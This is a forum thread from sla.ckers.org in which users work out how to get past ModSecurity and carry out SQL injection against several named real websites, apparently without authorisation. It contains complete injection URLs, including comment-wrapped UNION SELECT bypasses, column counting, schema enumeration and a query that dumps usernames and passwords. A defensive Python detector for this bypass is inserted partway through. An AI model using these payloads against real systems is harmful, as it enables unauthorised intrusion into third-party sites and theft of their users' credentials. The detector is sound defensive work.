Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 05, 2013 10:31AM

hi all

i have a problem during sql injection on a website :
Error 406 - Not Acceptable

An error has occurred. Generally a 406 error is caused because a request has been blocked by Mod Security. If you believe that your request has been blocked by mistake please contact the web site owner.

i just tried UNION SELECT 1,2,3,4,5,6,7--

a tool like havij can bypass this but i can't find how to do it manually in the url

can somebody help me?

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 05, 2013 12:06PM

http://www.exploit-db.com/papers/17934/

it works, i tried

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 05, 2013 02:21PM

hi and thx, it seems to work fine :)

but i have a new problem now, i can't see the columns :(

i got many errors like:
Warning: mysql_num_rows():
Warning: mysql_fetch_array()

this is 1 of the links where i try to inject

http://comm.icpdas-usa.com/products.php?PID=3487+/*!order*/+/*!by*/+100+--

i also tried with union select
http://comm.icpdas-usa.com/products.php?PID=3487+/*!union*/+/*!select*/+1,2,3,4,5+--

but the errors are still the same

did i make a mistake in the syntax or ?

sorry for my bad english :s

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 08:21AM

it's a nice problem :S

i tried this http://comm.icpdas-usa.com/products.php?PID=348+/*!/**/aND/**/*/+1/*!=*/1

and it seems to work, if u change and 1=2 the page turns blank

now i'm working on the union select

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 09:03AM

this is the url that that fucking op havij uses

http://comm.icpdas-usa.com//products.php?PID=999999.9+%2F*!30000union+all+select+0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536*%2F--

to extract the db name, but it is so hard to understand o_O never did a query so pro :D

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 09:24AM

yessss
------> http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7 <------

http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,group_concat(/*!table_name*/),5,6,7+from+/*!inforMAtion_schema*/.tables+/*!wHEre*/+/*!taBLe_scheMA*/like+database()

was a pleasure :), my first mod_security injection :)))



Edited 3 time(s). Last edit at 11/06/2013 09:49AM by tascio.

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 10:08AM

wow thank you, very nice
i will take some time to understand all of this, i have many similar websites
that op havij can get and not me :)

again thank you



Edited 1 time(s). Last edit at 11/06/2013 10:15AM by kenjii.

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 10:49AM

to bypass mod_security u should just enclose only the MySql commands between /*! */

oh many similar websites :D, if u have any problem post post! they are useful also to me to learn more :D

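Added example, not part of the thread and not ModSecurity's own code: the posts above get past a string-matching filter by wrapping keywords in MySQL versioned comments (`/*! ... */`), whose body MySQL executes. A filter that strips every C-style comment before matching deletes the wrapped keyword and sees nothing, so this sketch unwraps versioned comments instead and then matches. The rule names, function names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)  # comments MySQL really ignores
VERSIONED_OPEN = re.compile(r"/\*!(?:\d{5,6})?")     # /*! or /*!30000 : body is executed
ANY_COMMENT = re.compile(r"/\*.*?\*/", re.S)         # what "strip all comments" removes

RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "order_by_index": re.compile(r"\b(?:order|group)\s+by\s+\d+"),
    "schema_enumeration": re.compile(r"\binformation_schema\b"),
}

def _squash(s):
    return " ".join(s.lower().split())

def naive_normalize(query):
    """Weak: treats /*!...*/ as an ordinary comment, so the wrapped keyword vanishes."""
    return _squash(ANY_COMMENT.sub(" ", unquote_plus(query)))

def mysql_normalize(query):
    """Mirror MySQL: drop plain comments, keep the body of versioned ones."""
    s = PLAIN_COMMENT.sub(" ", unquote_plus(query))
    s = VERSIONED_OPEN.sub(" ", s).replace("*/", " ")
    return _squash(s)

def rule_hits(text):
    """Names of the rules that match an already-normalized string."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def inspect(query):
    """Signals found in one raw (still URL-encoded) query string."""
    hits = rule_hits(mysql_normalize(query))
    if "/*!" in unquote_plus(query):
        hits.append("versioned_comment")  # rarely legitimate in a request parameter
    return sorted(hits)

# Constructed access-log query strings using the wrapper shapes quoted in the thread.
SAMPLES = [
    "PID=3487",
    "PID=3487+/*!order*/+/*!by*/+100+--",
    "PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7",
    "PID=999999.9+%2F*!30000union+all+select+0x31%2C0x32*%2F--",
    "PID=348+/*!/**/aND/**/*/+1/*!=*/1",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"{q}\n  naive: {rule_hits(naive_normalize(q))}\n  mysql: {inspect(q)}")
```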
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 11:02AM

it seems i need to get more skill to understand all :P

http://comm.icpdas-usa.com/products.php?PID=348+/*!/**/aND/**/*/+1/*!=*/1

this works for me too but i can't do order by to get the column number...
(with order by 1 no error, order by 2 i start to have errors.. finally i think i have understood but not sure..)

on this :
http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7

i can see the vul column is 4 but when i look at havij it says that

Turning on mod_security bypass
Selected Column Count is 3
Valid String Column is 2

O_O

also why is the pid now 999999 instead of 3487 (i mean why doesn't it work with the normal pid)

i have many questions like this if you want :P

if you want another website look at this one

http://www.yubet.ca/item.php?id=117

the same, i can't get it manually but havij can :'(



Edited 3 time(s). Last edit at 11/06/2013 11:13AM by kenjii.

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 11:47AM

for the first question:
http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+6 shows us the product

http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+7 shows us the product

http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+8 doesn't show us the product, so our union select has 7 fields

for the columns, use havij just for help but don't care about the results, he is mad :O
and too op for us :D

for the pid=99999, union select to work needs a non-existent^^ variable, often i use the ' for example id=12' union all select ....
or the - id=-21 union all select.....
if u use a variable that exists in the database, the db shows u the page and not the open doors like our 4 in our injection

http://sechow.com/bricks/docs/content-page-1.html <-- explained very well



Edited 1 time(s). Last edit at 11/06/2013 11:48AM by tascio.

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 12:16PM

uhm open a new topic for this http://www.yubet.ca/item.php?id=117
it's curious

http://www.yubet.ca/item.php?id=117+group+by+64-- no error
http://www.yubet.ca/item.php?id=117+group+by+65-- db error
then there are 64 fields in union select ?_?_? :O

http://www.yubet.ca/item.php?id=99999+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64--

it works but returns an error :O wtf?_?

open a new topic for help

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 01:08PM

thank you again, in 2 replies from you i have learned more than in everything i read before :)

if you have other papers or tutorials to learn from i'm interested :)

here is another site with something strange for me, i let you see, i got some interesting errors

http://www.dragonsphereny.com/product_list.php?pid=14

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 04:27PM

I have another question, why when i look at data in 1 column i can see some info and when i select 2 columns i get 0 info ?

I mean when i select user i get some usernames (not all, just some...) and when i select password i get some pass but when i ask for user and pass i see nothing


it does that in havij too, another example:

when i choose id i get all ids
if i ask for username i have all usernames
but if i ask for id and username i get nothing (0 id and 0 username)

I know there is data in it coz i can see it if i choose only 1 column
and sometimes i want to see data in 1 column and i see nothing but if i choose 2 columns i can see data

is there something like a protection or a filter to bypass to see the 2 columns?



Edited 1 time(s). Last edit at 11/06/2013 04:30PM by kenjii.

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 08, 2013 04:27AM

try this syntax
union all select 1,2,group_concat(admin,password),4,5 from users

u can add special chars for easier reading
union all select 1,2,group_concat(admin,0x23,password,0x20),4,5 from users

like this
http://www.gallina.it/it/prodotti/index.php?prod=999+union+all+select+1,2,3,4,5,group_concat(co_nome,0x23,co_password,0x20),7,8,9,10,11,12,13+from+utenti

i added the special char # (0x23) between username and password and a free space (0x20) to divide rows

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 08, 2013 06:36AM

ok thank you, me i know 0x3a to add : , it helps me to read :)

Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: guantouqiang
Date: April 08, 2014 10:36AM

good job
